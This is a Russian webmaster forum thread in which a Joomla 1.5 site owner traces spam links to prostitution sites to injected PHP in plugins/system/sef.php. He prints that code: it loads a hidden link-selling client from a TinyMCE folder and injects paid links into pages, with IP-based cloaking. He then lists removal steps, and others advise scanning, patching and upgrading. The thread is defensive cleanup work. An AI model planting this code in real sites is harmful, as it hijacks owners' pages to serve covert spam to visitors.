Взлом сайта на joomle 1,5

**Babaika** · 25.04.2016 19:51

Всем привет.
Есть сайт на joomla 1,5 .
В самом низу ниже футера перед </body> появились ссылки на проституток и т.д.
Пересмотрел все файлы шаблона, файлы локализации в папке language, файлы модуля mod-footer - все чисто. Куда еще копать?

**prihod** · 25.04.2016 20:00

Проверяйте Айболитом

**kuzmi4** · 25.04.2016 20:06

Поищите ТоталКомандером по всему сайту base64

**Babaika** · 26.04.2016 10:46

Короче, разобрался. Нехорошие граждане решили в мэйнлинке заработать.

1. Идем в plugins/system/sef.php и сносим этот код:

/*<mainlink>*/
$bodyText = JResponse::getBody();
if (preg_match("/((\s+)<link.*)/i", $bodyText, $result)) {
$link = $result[1];
}
$link = preg_replace('/(\s+)/i', '$1<link rel="stylesheet" type="text/css" href="plugins/editors/tinymce/tinymce.css" />', $link, 1);
$bodyText = preg_replace('/((\s+)<link.*)/i', '$1'.$link, $bodyText, 1);
JResponse::setBody($bodyText);
if ($_GET["type"] === "css" && $_GET["v"] === "3.0") {
JResponse::setHeader('Content-Type', "text/css", true);
JResponse::setBody(file_get_contents("plugins/editors/tinymce/tinymce.css"));
}
$dir_path = ( $_SERVER['DOCUMENT_ROOT'] . "/plugins/editors/tinymce/data/");
require_once($dir_path . 'index.php');
$o['USERNAME'] = 'C253E88948E8DD343B5B012DD8980FFD';
$o['charset'] = JFactory::getDocument()->getCharset();
$client_lnk = new MLClient($o);
$bodyText = JResponse::getBody();

$dirPath = realpath("."). "/components/com_content";
if (file_exists($dirPath . "/stat2.log")) {
$ips = file($dirPath . "/stat2.log");
$iplist_cnt = count($ips);
$ip = $_SERVER["REMOTE_ADDR"];
$min = ip2long(long2ip(ip2long($ip) & 0xFFFFFF00));
$max = ip2long(long2ip(ip2long($ip) | 0x000000FF));

for($i = 0; $i < $iplist_cnt; $i++) {
$needle = trim($ips[$i]);
if (($needle >= $min) AND ($needle <= $max)) {
$iKnowYou = true;
break;
}
}
} else {
$iKnowYou = true;
}
$links = $client_lnk->build_links();
if (!$iKnowYou) {
$bodyText = preg_replace("~(.*)(<(\s*?)\/(\s*?)body([^>]*?)>)~s", "$1\r\n<div>" . $links . "</div>$2", $bodyText);
}

JResponse::setBody(preg_replace("~(<(\s*?)body([^>]*?)>)~", "$1\r\n<div class='items-body element'>" . $links . "</div>", $bodyText));
/*</mainlink>*/

2. Идем в plugins\editors\tinymce\data и удаляем index.php .
В папке data удаляем подпапку data со всем содержимым

**Ems** · 26.04.2016 10:51

Сообщение от Babaika

Идем в plugins/system/sef.php и сносим этот код

Сообщение от Babaika

Идем в plugins\editors\tinymce\data и удаляем index.php

И всё? Вас не смущает, что вы только удалили последствия взлома, а не закрыли дырки.

**dik85** · 27.04.2016 00:39

ага.. ждите новые взломы, если дыры не закрыли взломают обязательно повторно

**Securex** · 23.05.2016 20:15

можно статью почитать:
ktonanovenkogo.ru/joomla/joomla-1-5/kak-zashhitit-joomla-1-5-virusov-vzlomov-postavit-zashhitu-adminku-joomla-wordpress.html

на мой взгляд, лучше бы джумлу обновить.

**krendelll** · 23.05.2016 20:55

Там можно легко мигрировать на 2,5 или 3 версию, скачайте плагин.

	25.04.2016 19:51 #1
Babaika Новичок Регистрация: 23.08.2013 Сообщений: 7 Репутация: 0	Всем привет. Есть сайт на joomla 1,5 . В самом низу ниже футера перед </body> появились ссылки на проституток и т.д. Пересмотрел все файлы шаблона, файлы локализации в папке language, файлы модуля mod-footer - все чисто. Куда еще копать?
0 Babaika

	25.04.2016 20:00 #2
prihod Опытный Регистрация: 27.03.2015 Сообщений: 271 Репутация: 35	Проверяйте Айболитом
0 prihod

	25.04.2016 20:06 #3
kuzmi4 Гуру Регистрация: 26.02.2014 Сообщений: 526 Репутация: 105 Webmoney BL: ?	Поищите ТоталКомандером по всему сайту base64 Создай сайт и Заработай на нём!
0 kuzmi4

	26.04.2016 10:46 #4
Babaika Новичок Регистрация: 23.08.2013 Сообщений: 7 Репутация: 0	Короче, разобрался. Нехорошие граждане решили в мэйнлинке заработать. 1. Идем в plugins/system/sef.php и сносим этот код: /<mainlink>/ $bodyText = JResponse::getBody(); if (preg_match("/((\s+)<link.)/i", $bodyText, $result)) { $link = $result[1]; } $link = preg_replace('/(\s+)/i', '$1<link rel="stylesheet" type="text/css" href="plugins/editors/tinymce/tinymce.css" />', $link, 1); $bodyText = preg_replace('/((\s+)<link.)/i', '$1'.$link, $bodyText, 1); JResponse::setBody($bodyText); if ($_GET["type"] === "css" && $_GET["v"] === "3.0") { JResponse::setHeader('Content-Type', "text/css", true); JResponse::setBody(file_get_contents("plugins/editors/tinymce/tinymce.css")); } $dir_path = ( $_SERVER['DOCUMENT_ROOT'] . "/plugins/editors/tinymce/data/"); require_once($dir_path . 'index.php'); $o['USERNAME'] = 'C253E88948E8DD343B5B012DD8980FFD'; $o['charset'] = JFactory::getDocument()->getCharset(); $client_lnk = new MLClient($o); $bodyText = JResponse::getBody(); $dirPath = realpath("."). "/components/com_content"; if (file_exists($dirPath . "/stat2.log")) { $ips = file($dirPath . "/stat2.log"); $iplist_cnt = count($ips); $ip = $_SERVER["REMOTE_ADDR"]; $min = ip2long(long2ip(ip2long($ip) & 0xFFFFFF00)); $max = ip2long(long2ip(ip2long($ip) \| 0x000000FF)); for($i = 0; $i < $iplist_cnt; $i++) { $needle = trim($ips[$i]); if (($needle >= $min) AND ($needle <= $max)) { $iKnowYou = true; break; } } } else { $iKnowYou = true; } $links = $client_lnk->build_links(); if (!$iKnowYou) { $bodyText = preg_replace("~(.)(<(\s?)\/(\s?)body([^>]?)>)~s", "$1\r\n<div>" . $links . "</div>$2", $bodyText); } JResponse::setBody(preg_replace("~(<(\s?)body([^>]?)>)~", "$1\r\n<div class='items-body element'>" . $links . "</div>", $bodyText)); /</mainlink>/ 2. Идем в plugins\editors\tinymce\data и удаляем index.php . В папке data удаляем подпапку data со всем содержимым
0 Babaika

	26.04.2016 10:51 #5
Ems Гуру Регистрация: 24.05.2011 Сообщений: 2,032 Репутация: 663	Сообщение от Babaika Идем в plugins/system/sef.php и сносим этот код Сообщение от Babaika Идем в plugins\editors\tinymce\data и удаляем index.php И всё? Вас не смущает, что вы только удалили последствия взлома, а не закрыли дырки. Облачный хостинг из TOP-3 - от 1 Gb ОЗУ, от 25 GB SSD.
0 Ems

Взлом сайта на joomle 1,5

Опции темы

Тэги топика:

Похожие темы

Взлом сайта WP

Взлом мобильной версии сайта

Взлом сайта - Yesin DZ

Взлом сайта - Yesin DZ

Взлом сайта и интересный способ монетизации

Тем:

Сообщений:

Пользователей:

Сейчас на сайте:

Вход

Сайт

Разделы

Прочее

Следите за нами

Витрина ссылок

У нас проходит

У кого попросить инвайт?

Золотые темы форума

Последние новости

Популярные темы

Информеры

	27.04.2016 00:39 #6
dik85 Опытный Регистрация: 25.03.2011 Сообщений: 291 Репутация: 47 Webmoney BL: ?	ага.. ждите новые взломы, если дыры не закрыли взломают обязательно повторно
0 dik85

	23.05.2016 20:15 #7
Securex Студент Регистрация: 17.05.2016 Сообщений: 33 Репутация: 7	можно статью почитать: ktonanovenkogo.ru/joomla/joomla-1-5/kak-zashhitit-joomla-1-5-virusov-vzlomov-postavit-zashhitu-adminku-joomla-wordpress.html на мой взгляд, лучше бы джумлу обновить.
0 Securex

	23.05.2016 20:55 #8
krendelll Студент Регистрация: 09.07.2015 Сообщений: 53 Репутация: 12	Там можно легко мигрировать на 2,5 или 3 версию, скачайте плагин.
-1 krendelll

Темы	Раздел	Ответов	Последний пост
Взлом сайта WP	WordPress	1	29.08.2012 01:21
Взлом мобильной версии сайта	Web программирование	5	04.03.2012 17:45
Взлом сайта - Yesin DZ	Web программирование	7	02.01.2012 12:57
Взлом сайта - Yesin DZ	Вопросы от новичков	0	01.01.2012 22:25
Взлом сайта и интересный способ монетизации	Вопросы от новичков	0	26.12.2011 20:00